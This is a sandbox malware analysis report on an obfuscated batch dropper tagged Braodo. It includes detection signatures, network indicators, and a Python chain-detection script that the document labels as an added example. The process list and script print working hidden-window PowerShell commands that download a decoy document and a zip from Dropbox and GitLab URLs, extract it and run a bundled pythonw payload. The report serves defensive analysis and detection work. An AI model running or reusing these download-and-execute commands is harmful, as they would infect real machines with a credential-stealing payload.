
Windows Analysis Report
hngadsfkgj17.bat

Overview

General Information

Sample name: hngadsfkgj17.bat
Analysis ID: 1578271
MD5: 6c35c77c00bba44f2d86d74cd3e6a3de
SHA1: 82e5786895b0ddc0418699d2d980c818406d8063
SHA256: 61e9db26c03e7850f014dff5430495ada8406aea46fc4fbe237b68d3abc8e59d
Tags: bat, Braodo, user-JAMESWT_MHT

Detection

Abobus Obfuscator, Braodo
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5388 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 6312 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 4932 cmdline: findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6872 cmdline: findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 4784 cmdline: findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2812 cmdline: findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 1764 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 4304 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 1404 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5272 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5064 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5260 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2012 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2188 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
hngadsfkgj17.bat | JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 5272 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 5260 | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security |
Process Memory Space: powershell.exe PID: 5260 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_5272.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_5260.amsi.csv | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security |
amsi64_5260.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_2188.amsi.csv | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security |

                  System Summary

Source: Process started. Matched by Sigma rules from the following authors (the event data is identical for all six matches and is listed once below):
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
  • Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data:
    Command / CommandLine / ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
    CommandLine|base64offset|contains: hv)^
    Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "
    ParentImage: C:\Windows\System32\cmd.exe
    ParentProcessId: 2324
    ParentProcessName: cmd.exe
    ProcessId: 5272
    ProcessName: powershell.exe
Source: File created. Author: Florian Roth (Nextron Systems). Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5260, TargetFilename: C:\Users\Public\Document.zip
                  No Suricata rule has matched


                  AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 91.0% probability
Source: unknown; HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: global traffic; HTTP traffic detected: GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1; Host: www.dropbox.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1; Host: gitlab.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 172.65.251.78
Source: Joe Sandbox View; IP Address: 162.125.69.18
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic; DNS traffic detected: DNS query: www.dropbox.com
                  Source: global traffic; DNS traffic detected: DNS query: ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com
                  Source: global traffic; DNS traffic detected: DNS query: gitlab.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49738 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD344D652512_2_00007FFD344D6525
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344C5EB814_2_00007FFD344C5EB8
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D38D516_2_00007FFD344D38D5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D3D3016_2_00007FFD344D3D30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D53C116_2_00007FFD344D53C1
                  Source: classification engineClassification label: mal88.troj.evad.winBAT@30/16@3/2
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baoyfxcz.5oa.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp.com 437
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
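The process list above records one chain: hidden-window PowerShell fetches a decoy .docx from Dropbox and opens it, fetches a zip from GitLab into C:\Users\Public, unpacks it with ZipFile::ExtractToDirectory, then runs pythonw.exe from the unpacked directory with a .pd file as its argument, all spawned by the batch file, which first greps its own text with findstr. A detection that correlates those stages on file paths catches the chain where a lone "PowerShell DownloadFile" hit would only produce noise. The script below is an added example, not part of the Joe Sandbox report and not one of the Sigma rules it cites: it replays process-creation events constructed from the command lines above through such rules. The Event field names, rule names, weights and the hosting-domain list are assumptions made for the example.

```python
"""Chain detector for the download -> unpack -> execute sequence in the process list
above. Added example, not part of the Joe Sandbox report; rule names, weights, Event
fields and HOSTING_DOMAINS are assumptions. SAMPLE is constructed from the report."""
import re
from dataclasses import dataclass

HOSTING_DOMAINS = ("dropbox.com", "gitlab.com", "github.com", "drive.google.com")  # assumed list

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'(?P<url>https?://[^']+)'\s*,\s*'(?P<dest>[^']+)'", re.I)
EXTRACT_RE = re.compile(r"ExtractToDirectory\(\s*'(?P<src>[^']+)'\s*,\s*'(?P<dst>[^']+)'", re.I)
PYEXEC_RE = re.compile(r"(?P<exe>\S+[\\/]pythonw?\.exe)\s+(?P<script>\S+)", re.I)
DECOY_RE = re.compile(r"Start-Process\s+'(?P<doc>[^']+\.(?:docx?|xlsx?|pdf))'", re.I)
SELFGREP_RE = re.compile(r'"(?P<target>[^"]+\.bat)"', re.I)
PUBLIC_RE = re.compile(r"^c:[\\/]users[\\/]public[\\/]", re.I)
HIDDEN_RE = re.compile(r"-WindowStyle\s+Hidden", re.I)

@dataclass
class Event:  # one process-creation record; field names are an assumption
    parent_cmdline: str
    image: str
    cmdline: str

@dataclass
class Finding:
    rule: str
    detail: str
    weight: int

@dataclass
class Verdict:
    findings: list
    score: int
    chain_complete: bool  # download, unpack and execute all link up on file paths

def norm(path):
    """Fold separators and case so 'C:/Users/Public/Document.zip' equals 'C:\\Users\\Public\\Document.zip'."""
    return path.replace("/", "\\").rstrip("\\").lower()

def host_of(url):
    m = re.match(r"https?://([^/:?]+)", url, re.I)
    return m.group(1).lower() if m else ""

def is_hosting(host):
    return any(host == d or host.endswith("." + d) for d in HOSTING_DOMAINS)

def analyze(events):
    findings, downloaded, unpacked, linked = [], set(), set(), set()
    for ev in events:
        img, cmd = ev.image.lower(), ev.cmdline
        if img.endswith("findstr.exe"):
            # The batch file greps its own text for keywords (the set/goto/echo/pause rows above).
            m = SELFGREP_RE.search(cmd)
            if m and norm(m["target"]) in norm(ev.parent_cmdline):
                findings.append(Finding("bat_greps_itself", cmd, 1))
            continue
        if not img.endswith("powershell.exe"):
            continue
        hidden = 1 if HIDDEN_RE.search(cmd) else 0
        if m := DOWNLOAD_RE.search(cmd):
            host = host_of(m["url"])
            downloaded.add(norm(m["dest"]))  # remember where the payload landed
            findings.append(Finding("ps_webclient_download", f"{host} -> {m['dest']}",
                                    (3 if is_hosting(host) else 2) + hidden))
        if m := DECOY_RE.search(cmd):
            findings.append(Finding("decoy_document_opened", m["doc"], 1))
        if m := EXTRACT_RE.search(cmd):
            from_download = norm(m["src"]) in downloaded  # archive is one we watched arrive
            if from_download or PUBLIC_RE.search(m["dst"]):
                unpacked.add(norm(m["dst"]))
                if from_download:
                    linked.add("unpack")
                findings.append(Finding("ps_zip_extract", f"{m['src']} -> {m['dst']}", 3 if from_download else 2))
        if m := PYEXEC_RE.search(cmd):
            exe, script = norm(m["exe"]), m["script"]
            from_archive = any(exe.startswith(d + "\\") for d in unpacked)  # interpreter came out of the zip
            if from_archive or PUBLIC_RE.search(exe):
                if from_archive:
                    linked.add("execute")
                w = 2 + (0 if script.lower().endswith(".py") else 1) + (1 if from_archive else 0)
                findings.append(Finding("python_from_unpacked_dir", f"{m['exe']} {script}", w))
    return Verdict(findings, sum(f.weight for f in findings), {"unpack", "execute"} <= linked)

BAT = r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngadsfkgj17.bat" "'
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [  # (parent cmdline, image, cmdline), constructed from the report's process list
    (BAT, r"C:\Windows\System32\findstr.exe", r'findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"'),
    (BAT, PS, r"""powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')" """),
    (BAT, PS, r"""powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'" """),
    (BAT, PS, r"""powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')" """),
    (BAT, PS, r"""powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" """),
    (BAT, PS, r"""powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp" """),
]

def load_sample():
    return [Event(p, i, c.strip()) for p, i, c in SAMPLE]

if __name__ == "__main__":
    v = analyze(load_sample())
    for f in v.findings:
        print(f"[{f.weight}] {f.rule}: {f.detail}")
    print(f"score={v.score} chain_complete={v.chain_complete}")
```

The scoring weights are illustrative; the linking is the useful part. ExtractToDirectory names its source with forward slashes while DownloadFile wrote it with backslashes, so the paths are normalised before comparison; the pythonw.exe that runs afterwards is matched against the directory the extraction created rather than against a fixed path, so the same rules still fire when the attacker renames Document.zip. A download from an internal host with no unpack stage produces a low score and no completed chain.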
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll, fsutilext.dll
                  Source: C:\Windows\System32\find.exe (process 1 of 2) | Section loaded: ulib.dll, fsutilext.dll
                  Source: C:\Windows\System32\find.exe (process 2 of 2) | Section loaded: ulib.dll, fsutilext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process 1 of 5) | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process 2 of 5) | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process 3 of 5) | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process 4 of 5) | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process 5 of 5) | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Binary string: jn.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ystem.pdb=H source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb` source: powershell.exe, 0000000C.00000002.2306528560.000001FEF87D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.2306528560.000001FEF87D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Compression.FileSystem.pdb7-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2543362832.0000029579060000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *e.pdb source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbs source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000010.00000002.2543362832.000002957909B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tem.pdb-z source: powershell.exe, 00000010.00000002.2544841727.0000029579571000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG5 source: powershell.exe, 00000010.00000002.2544841727.00000295795C7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2419838546.0000028FD5CD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 00000010.00000002.2544841727.00000295795C7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb6 source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bpdbtem.pdbbH source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000010.00000002.2543362832.0000029579060000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000010.00000002.2543362832.000002957909B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbg source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbF source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5C99000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: Yara match | File source: hngadsfkgj17.bat, type: SAMPLE
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
